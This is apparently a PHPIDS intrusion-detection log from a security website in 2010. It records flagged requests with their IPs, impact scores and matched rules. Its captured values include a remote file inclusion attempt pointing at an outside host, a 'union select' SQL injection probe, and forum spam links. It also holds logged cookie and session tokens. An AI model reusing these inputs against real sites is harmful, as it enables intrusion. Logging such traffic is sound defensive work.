Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122969
Name:REQUEST.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:20
Created:2010-04-29 13:43:33
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122970
Name:GET.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:20
Created:2010-04-29 13:43:33
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122971
Name:REQUEST.page
Value:reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:26
Created:2010-04-29 13:43:33
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122972
Name:GET.page
Value:reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://phamsight.com/docs/images/head??
IP:204.15.190.163
Impact:26
Created:2010-04-29 13:43:33
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122967
Name:REQUEST.codeme
Value:Your Site Is Great!, <a href= http://paylessshoes.imagekind.com/#1 >payless shoes</a> [url=http://paylessshoes.imagekind.com/#1]payless shoes[/url], 55454,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-29 13:12:09
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122968
Name:POST.codeme
Value:Your Site Is Great!, <a href= http://paylessshoes.imagekind.com/#1 >payless shoes</a> [url=http://paylessshoes.imagekind.com/#1]payless shoes[/url], 55454,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-29 13:12:09
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122965
Name:REQUEST.codeme
Value:Great, <a href= http://raybansunglasses.imagekind.com/ >ray ban sunglasses</a>, [url= http://raybansunglasses.imagekind.com/ ]ray ban sunglasses[/url], iud,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-29 12:21:14
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122966
Name:POST.codeme
Value:Great, <a href= http://raybansunglasses.imagekind.com/ >ray ban sunglasses</a>, [url= http://raybansunglasses.imagekind.com/ ]ray ban sunglasses[/url], iud,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-29 12:21:14
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122963
Name:REQUEST.page
Value:''
Page:/i.php?page=''
IP:208.80.193.28
Impact:12
Created:2010-04-29 11:51:39
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122964
Name:GET.page
Value:''
Page:/i.php?page=''
IP:208.80.193.28
Impact:12
Created:2010-04-29 11:51:39
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122961
Name:REQUEST.bcsi-ac-3CDF84328BD51AF7
Value:1AD2215600000005zU8vnko2DnhbiN8y7ekMda0qgZcjAAAABQAAAOuCIACAcAAAAgAAAFDtAAA=
Page:/?bcsi-ac-3CDF84328BD51AF7=1AD2215600000005zU8vnko2DnhbiN8y7ekMda0qgZcjAAAABQAAAOuCIACAcAAAAgAAAFDtAAA=
IP:174.36.36.38
Impact:14
Created:2010-04-29 10:53:54
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.5172413793103

ID:122962
Name:GET.bcsi-ac-3CDF84328BD51AF7
Value:1AD2215600000005zU8vnko2DnhbiN8y7ekMda0qgZcjAAAABQAAAOuCIACAcAAAAgAAAFDtAAA=
Page:/?bcsi-ac-3CDF84328BD51AF7=1AD2215600000005zU8vnko2DnhbiN8y7ekMda0qgZcjAAAABQAAAOuCIACAcAAAAgAAAFDtAAA=
IP:174.36.36.38
Impact:14
Created:2010-04-29 10:53:54
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.5172413793103

ID:122959
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-29 10:53:46
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122960
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-29 10:53:46
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122957
Name:REQUEST.codeme
Value:really great sites, thank you, <a href= http://chanelsunglasses.imagekind.com/#1 >chanel sunglasses</a> [url=http://chanelsunglasses.imagekind.com/#1]chanel sunglasses[/url], 76313,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-29 10:39:54
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122958
Name:POST.codeme
Value:really great sites, thank you, <a href= http://chanelsunglasses.imagekind.com/#1 >chanel sunglasses</a> [url=http://chanelsunglasses.imagekind.com/#1]chanel sunglasses[/url], 76313,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-29 10:39:54
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122955
Name:REQUEST.codeme
Value:can you do thi for me, <a href= http://exoticgstringbikini.imagekind.com/ >exotic g string bikini online</a>, [url= http://exoticgstringbikini.imagekind.com/ ]exotic g string bikini online[/url], sjyob,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-29 08:59:48
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122956
Name:POST.codeme
Value:can you do thi for me, <a href= http://exoticgstringbikini.imagekind.com/ >exotic g string bikini online</a>, [url= http://exoticgstringbikini.imagekind.com/ ]exotic g string bikini online[/url], sjyob,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-29 08:59:48
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122953
Name:REQUEST.page
Value:security/networkprinterhacking>Hacking network printers</a> by northpole<br> <a href=
Page:/i.php?page=security/networkprinterhacking%3EHacking+network+printers%3C/a%3E%0A%09by+northpole%3Cbr%3E%0A%09%3Ca+href=
IP:66.249.67.227
Impact:8
Created:2010-04-29 08:48:52
Details:
	<a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122954
Name:GET.page
Value:security/networkprinterhacking>Hacking network printers</a> by northpole<br> <a href=
Page:/i.php?page=security/networkprinterhacking%3EHacking+network+printers%3C/a%3E%0A%09by+northpole%3Cbr%3E%0A%09%3Ca+href=
IP:66.249.67.227
Impact:8
Created:2010-04-29 08:48:52
Details:
	<a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122951
Name:REQUEST.codeme
Value:Nise site, <a href= http://tinystringbikini.imagekind.com/#1 >tiny string bikini online</a> [url=http://tinystringbikini.imagekind.com/#1]tiny string bikini online[/url], 958388,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-29 08:09:23
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122952
Name:POST.codeme
Value:Nise site, <a href= http://tinystringbikini.imagekind.com/#1 >tiny string bikini online</a> [url=http://tinystringbikini.imagekind.com/#1]tiny string bikini online[/url], 958388,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-29 08:09:23
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122949
Name:REQUEST.codeme
Value:Very interesting sites., <a href= http://skimpygstringbikini.imagekind.com/#1 >skimpy g string bikini information</a> [url=http://skimpygstringbikini.imagekind.com/#1]skimpy g string bikini information[/url], 7144,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-29 07:19:22
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122950
Name:POST.codeme
Value:Very interesting sites., <a href= http://skimpygstringbikini.imagekind.com/#1 >skimpy g string bikini information</a> [url=http://skimpygstringbikini.imagekind.com/#1]skimpy g string bikini information[/url], 7144,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-29 07:19:22
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122947
Name:REQUEST.codeme
Value:best for you, <a href= http://microbikinigallery.imagekind.com/#1 >micro bikini gallery</a> [url=http://microbikinigallery.imagekind.com/#1]micro bikini gallery[/url], vgg,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-29 05:39:35
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122948
Name:POST.codeme
Value:best for you, <a href= http://microbikinigallery.imagekind.com/#1 >micro bikini gallery</a> [url=http://microbikinigallery.imagekind.com/#1]micro bikini gallery[/url], vgg,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-29 05:39:35
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122945
Name:REQUEST.page
Value:security/networkprinterhacking and 0=1 union select
Page:/i.php?page=security/networkprinterhacking+and+0=1+union+select+
IP:123.19.106.204
Impact:20
Created:2010-04-29 05:19:09
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122946
Name:GET.page
Value:security/networkprinterhacking and 0=1 union select
Page:/i.php?page=security/networkprinterhacking+and+0=1+union+select+
IP:123.19.106.204
Impact:20
Created:2010-04-29 05:19:09
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122941
Name:REQUEST.PREF
Value:ID=396d96915dd4e86c:TM=1272539065:LM=1272539065:S=_LBRxQE7X18p3Yll
Page:/i.php?page=videos/recovercookies
IP:128.59.20.227
Impact:30
Created:2010-04-29 04:02:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:122942
Name:REQUEST.domain
Value:.google.com, NID=34=OOUWRABRmGNl6m4Za1hxsYkpIPP7hqysIFRvkisPZBZP4NIJz5olzgXoqsokNdKFOr-Zj4uKbamEYdhKlRzI6Nl5kZD5jDFz6DtFRF7-17BdFM97Yxgx77U8WckePxFG
Page:/i.php?page=videos/recovercookies
IP:128.59.20.227
Impact:30
Created:2010-04-29 04:02:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122943
Name:COOKIE.PREF
Value:ID=396d96915dd4e86c:TM=1272539065:LM=1272539065:S=_LBRxQE7X18p3Yll
Page:/i.php?page=videos/recovercookies
IP:128.59.20.227
Impact:30
Created:2010-04-29 04:02:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:122944
Name:COOKIE.domain
Value:.google.com, NID=34=OOUWRABRmGNl6m4Za1hxsYkpIPP7hqysIFRvkisPZBZP4NIJz5olzgXoqsokNdKFOr-Zj4uKbamEYdhKlRzI6Nl5kZD5jDFz6DtFRF7-17BdFM97Yxgx77U8WckePxFG
Page:/i.php?page=videos/recovercookies
IP:128.59.20.227
Impact:30
Created:2010-04-29 04:02:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122935
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=security/windows-forensics-registry-and-file-system-spots
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:54:40
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122936
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=security/windows-forensics-registry-and-file-system-spots
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:54:40
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122937
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=security/windows-forensics-registry-and-file-system-spots
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:54:40
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122938
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=security/windows-forensics-registry-and-file-system-spots
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:54:40
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122939
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=security/windows-forensics-registry-and-file-system-spots
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:54:40
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122940
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=security/windows-forensics-registry-and-file-system-spots
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:54:40
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122929
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=security/zipit-z2-hacking-userland-side-track
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:58
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122930
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=security/zipit-z2-hacking-userland-side-track
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:58
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122931
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=security/zipit-z2-hacking-userland-side-track
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:58
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122932
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=security/zipit-z2-hacking-userland-side-track
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:58
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122933
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=security/zipit-z2-hacking-userland-side-track
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:58
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122934
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=security/zipit-z2-hacking-userland-side-track
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:58
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122923
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=security/louisville-metasploit-class
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122924
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=security/louisville-metasploit-class
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122925
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=security/louisville-metasploit-class
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122926
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=security/louisville-metasploit-class
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122927
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=security/louisville-metasploit-class
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122928
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=security/louisville-metasploit-class
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:53
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122917
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=videos/when-web-2-attacks-rafal-los
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:49
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122918
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=videos/when-web-2-attacks-rafal-los
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:49
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122919
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=videos/when-web-2-attacks-rafal-los
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:49
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122920
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=videos/when-web-2-attacks-rafal-los
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:49
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122921
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=videos/when-web-2-attacks-rafal-los
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:49
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
